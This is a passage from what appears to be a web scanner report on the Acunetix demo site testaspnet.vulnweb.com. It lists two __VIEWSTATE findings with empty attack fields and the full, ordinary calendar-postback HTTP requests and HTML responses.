18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1145 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,145 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8282&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAEWkIjtoIZGRkdeF3Xi9OepRSj0xasO3WCr%2BzirY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKvgfADAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACD8AkX6o12UayJQCrcfhhZcFEPg0%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:36 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAEWkIjtoIZGRkdeF3Xi9OepRSj0xasO3WCr+zirY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKvgfADAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACD8AkX6o12UayJQCrcfhhZcFEPg0=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:White" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8286&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAuBItkdoIZGRk6YwnrYRaRcfeIbLKuRXOmV6fjE4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKs1Pv8BwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAi4CsnuQlBNsdZEkIIpCrRYCSPtm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:56 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAuBItkdoIZGRk6YwnrYRaRcfeIbLKuRXOmV6fjE4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKs1Pv8BwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAi4CsnuQlBNsdZEkIIpCrRYCSPtm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:White" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a 